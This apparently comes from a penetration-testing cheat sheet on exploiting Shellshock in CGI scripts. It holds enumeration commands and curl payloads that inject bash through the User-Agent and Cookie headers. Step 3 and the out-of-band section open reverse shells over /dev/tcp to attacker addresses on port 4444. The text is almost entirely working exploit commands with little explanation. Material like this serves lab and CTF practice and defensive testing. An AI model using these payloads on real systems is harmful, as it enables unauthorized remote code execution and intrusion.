CGI

feroxbuster -u http://$IP/cgi-bin/ -x sh,cgi,pl

shellshock

(step 1) - Testing for shellshock Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.

nmap $IP -p 80 --script=http-shellshock --script-args uri=/cgi-bin/test.cgi

(step 2) - PoC that we have RCE (you could also make a ping or web request to yourself and monitor that oth tcpdump)

curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://$IP/cgi-bin/test.cgi

(step 3) - Reverse shell

curl -k -H 'User-Agent: () { :; }; /bin/bash -c "exec bash -i &>/dev/tcp/10.10.16.2/4444 <&1"' http://$IP/cgi-bin/test.cgi

other

reflected

curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'

Out-Of-Band Use Cookie as alternative to User-Agent

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.16/4444 0>&1' http://$IP/cgi-bin/user.sh